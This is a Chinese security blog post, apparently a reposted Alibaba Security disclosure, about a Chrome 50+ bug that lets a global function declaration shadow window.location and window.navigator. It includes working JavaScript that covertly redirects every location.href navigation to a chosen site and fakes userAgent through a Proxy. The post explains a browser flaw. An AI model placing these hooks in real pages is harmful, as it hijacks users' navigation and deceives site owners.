Chrome出了个小bug:论如何在Chrome下劫持原生只读对象

概述

众所周知,虽然JavaScript是个很灵活的语言,浏览器里很多原生的方法都可以随意覆盖或者重写,比如alert。但是为了保证网页的安全性和网页制作者的一定控制权,有些浏览器对象是无法更改的,比如“window.location”对象,或者对它们的更改是无效的,比如”window.navigator”对象。然而,最近我发现Chrome出现了一个小“bug”,在Chrome 50+ 版本中,通过一些技巧可以轻易地重写这些对象,从而让恶意代码可以控制网页编写者的跳转行为。

实现window.location

location对象是个很特殊的浏览器内置对象,一般情况下是无法修改的,为了寻找是否有一种方法可以做到这件事,我做了一些尝试并得出了相应的结论:

1.无法修改location对象,直接修改会导致页面跳转:

	window.location = {};

2.无法通过Object.defineProperty来修改属性的configurable和writable,因此无法使用Object.watch及各种polyfill。

	Object.defineProperty(location,"href",{"configurable": true});

3.可以用Proxy对象代理location,但因为原因1,无法用locationProxy重写location对象。

	var locationProxy = new Proxy(location, {
set: function (target, key, value, receiver) {
console.log(target, key, value, receiver);
}});

4.可以freeze,使得对location.href赋值失效。然而这会影响到正常流程,因为光这样用户的代码逻辑就无法走通,劫持就失去了意义。

	Object.freeze(window.location)
Object.freeze(window)

看上去似乎没有任何办法能够做到了?然而山重水复疑无路,柳暗花明又一村。在尝试中我发现Chrome浏览器有个bug:在全局域里使用和location同名的函数声明,在函数自动提升后可以覆盖掉浏览器本身的window.location对象,没错,就是这样一行简单的代码:

	function location(){}

这样就可以起到重写并hook掉location的作用。而这个方法也只有在Chrome下有用,其它浏览器(如Firefox或者Edge)会提示 TypeError: can't redefine non-configurable property location

那么既然拿到了修改的方法,应该如何合理地劫持它呢? 首先需要备份一下location对象本身,但由于我们的关键函数 **function location(){} ** 本身是需要在全局域中执行,并且会自动提升,因此无法直接存储location对象。但是很多人都忽略的一点window.document对象中还有一份location对象,而这个对象,在目前浏览器中绝大多数情况下都和window.location没有区别,甚至就是对window.location的一份拷贝或者指针。于是我们可以使用window.document.location先备份一下location对象,然后修改之。

	var _location = window.document.location;

之后需要做的事情就是在劫持某些操作的时候,又保证正常的操作不会出问题,否则很容易被发现。我们可以使用ES5中的一些魔法方法,比如__proto__和__defineSetter__来实现我们需要的效果,比如我们对于location.href 的赋值操作,拦截并转向freebuf:

	location.__proto__ = _location;

	location.__defineSetter__('href', function(url) {
_location.href = "http://www.freebuf.com";
}); location.__defineGetter__('href', function(url) {
return _location.href;
});

或者使用ES6的Proxy代理,也同样可以实现相同功能:

	window.location = new Proxy(_location, {
set: function(target, prop, value, receiver){
if (prop !== 'href'){
Reflect.set(target, prop, value, receiver);
}else{
target.href = "http://www.freebuf.com";
}
}
})

最后,我们再将location对象设置为只读,防止轻易被修改

	Object.defineProperty(window,"location",{"writable": false});

这样就实现了一个暗藏玄机的window.location,偷偷将页面里所有通过location.href做的跳转改到了目标网站(freebuf)。

实现window.navigator

就像我开头说的一样,不止是location,navigator对象我们也可以通过这种方法偷偷篡改,让网站得到的浏览器信息(如userAgent)失真,要注意的重点就是如何找到一种方法保存原来的navigator对象,这里我们使用新建一个iframe来实现:

	var _navigator;

	function navigator(){}

	var frame = document.createElement('iframe');
frame.width = frame.height = 0;
frame.style.display = "none";
document.lastChild.appendChild(frame); _navigator = window.frames[0].window.navigator; window.navigator = new Proxy(_navigator, {
set: function(target, prop, value, receiver){
return Reflect.set(target, prop, value, receiver);
},
get: function(target, prop, receiver){
if (prop === 'userAgent'){
return "this is a faked userAgent";
}
return target[prop];
}
})

这段代码实现了让用户访问window.navigator.userAgemt时返回了一个假UA串。

总结

这个bug在Chrome 50至最新版内核中均存在,包括但不限于Chrome和各种使用Chromium内核的浏览器(Opera, UC)等。虽然由于局限性,独立存在的意义不大,但是在一些恶意脚本里还是存在一些利用的价值。

作者:负羽@阿里安全,更多安全类文章,请访问阿里聚安全博客

Chrome出了个小bug:论如何在Chrome下劫持原生只读对象的更多相关文章

  1. 淘宝WAP版小BUG分析

    前几天发现的一个淘宝WAP版的小BUG,就是用桌面版chrome看的时候产品评价中的图片显示不出来,都是图裂了. 这是什么原因呢?图片为什么会显示不出来呢?淘宝的技术人员.测试人员不可能没发现啊.开启 ...

  2. 解决JqueryUI 拖放排序遇到滚动条时有可能无法执行排序的小bug

    前些日子不是在做 使用Jquery-UI实现一次拖拽多个选中的元素操作嘛,在持续完善这个组件时遇到了一个关于拖放排序的bug.今天就着图片和代码重现一下,也顺便告诉大家如何解决这个问题. 首先先上图描 ...

  3. Chrome 的 100 个小技巧 中文版

    英文原版<100 Tips For Chrome, Chrome OS and ChromeBook Users>作者博客 - chromestory.com 本文是对<100 Ti ...

  4. 用 parseInt()解决的 小 bug

    在做轮播模块的时候遇到问题是:你在 连续指示小按钮 时候再去 只有 点击 下一张按钮,出现bug: 指示小按钮的 className 当前显示的 calssName 为 undefined ! // ...

  5. Chrome自带恐龙小游戏的源码研究(七)

    在上一篇<Chrome自带恐龙小游戏的源码研究(六)>中研究了恐龙的跳跃过程,这一篇研究恐龙与障碍物之间的碰撞检测. 碰撞盒子 游戏中采用的是矩形(非旋转矩形)碰撞.这类碰撞优点是计算比较 ...

  6. Chrome自带恐龙小游戏的源码研究(完)

    在上一篇<Chrome自带恐龙小游戏的源码研究(七)>中研究了恐龙与障碍物的碰撞检测,这一篇主要研究组成游戏的其它要素. 游戏分数记录 如图所示,分数及最高分记录显示在游戏界面的右上角,每 ...

  7. Chrome自带恐龙小游戏的源码研究(五)

    在上一篇<Chrome自带恐龙小游戏的源码研究(四)>中实现了障碍物的绘制及移动,从这一篇开始主要研究恐龙的绘制及一系列键盘动作的实现. 会眨眼睛的恐龙 在游戏开始前的待机界面,如果仔细观 ...

  8. 观CSDN站点小Bug有感

            今天早上在浏览博客的时候偶然发现CSDN博客的数据出现了异常,我也是头一次看到这么明显的Bug.详细什么表现呢?先来看个截图.例如以下:             常常看CSDN博客的人 ...

  9. [转帖]CHROME开发者工具的小技巧

    CHROME开发者工具的小技巧 https://coolshell.cn/articles/17634.html 需要仔细学习看一看呢. 2017年01月19日 陈皓 评论 58 条评论  64,08 ...

随机推荐

  1. ABP框架 - OData 集成

    文档目录 本节内容: 简介 安装 安装Nuget包 设置模块依赖 配置你的实体 创建控制器 示例 获取实体列表 请求 响应 获取单个实体 请求 响应 获取单个实体及导航属性 请求 响应 查询 请求 响 ...

  2. fiddler发送post请求

    1.指定为 post 请求,输入 url Content-Type: application/x-www-form-urlencoded;charset=utf-8 request body中的参数格 ...

  3. UWP开发之Mvvmlight实践七:如何查找设备(Mobile模拟器、实体手机、PC)中应用的Log等文件

    在开发中或者后期测试乃至最后交付使用的时候,如果应用出问题了我们一般的做法就是查看Log文件.上章也提到了查看Log文件,这章重点讲解下如何查看Log文件?如何找到我们需要的Packages安装包目录 ...

  4. CGI与FastCGI nginx+PHP-FPM

    本文转载自CGI与FastCGI 1.当我们在谈到cgi的时候,我们在讨论什么 最早的Web服务器简单地响应浏览器发来的HTTP请求,并将存储在服务器上的HTML文件返回给浏览器,也就是静态html. ...

  5. 【算法】C语言实现数组的动态分配

    C语言实现数组的动态分配 作者:白宁超 2016年10月27日20:13:13 摘要:数据结构和算法对于编程的意义不言而喻,具有指导意义的.无论从事算法优化方向研究,还是大数据处理,亦或者网站开发AP ...

  6. CommandPattern

    /** * 命令模式 * @author TMAC-J * 将调用者和接受者分离 * 可以将一组命令组合在一起,适合很多命令的时候 */ public class CommandPattern { i ...

  7. iOS 原生地图地理编码与反地理编码

    当我们要在App实现功能:输入地名,编码为经纬度,实现导航功能. 那么,我需要用到原生地图中的地理编码功能,而在Core Location中主要包含了定位.地理编码(包括反编码)功能. 在文件中导入 ...

  8. Android studio使用git教程

    ①下载Git工具,配置到Android studio中 http://git-scm.com/downloads ------------------------------------------- ...

  9. Mysql - 存储过程/自定义函数

    在数据库操作中, 尤其是碰到一些复杂一些的系统, 不可避免的, 会用到函数/自定义函数, 或者存储过程. 实际项目中, 自定义函数和存储过程是越少越好, 因为这个东西多了, 也是一个非常难以维护的地方 ...

  10. 第14章 Linux启动管理(1)_系统运行级别

    1. CentOS 6.x 启动管理 (1)系统运行级别 ①运行级别 运行级别 含义 0 关机 1 单用户模式,可以想象为Windows的安全模式,主要用于系统修复.(但不是Linux的安全模式) 2 ...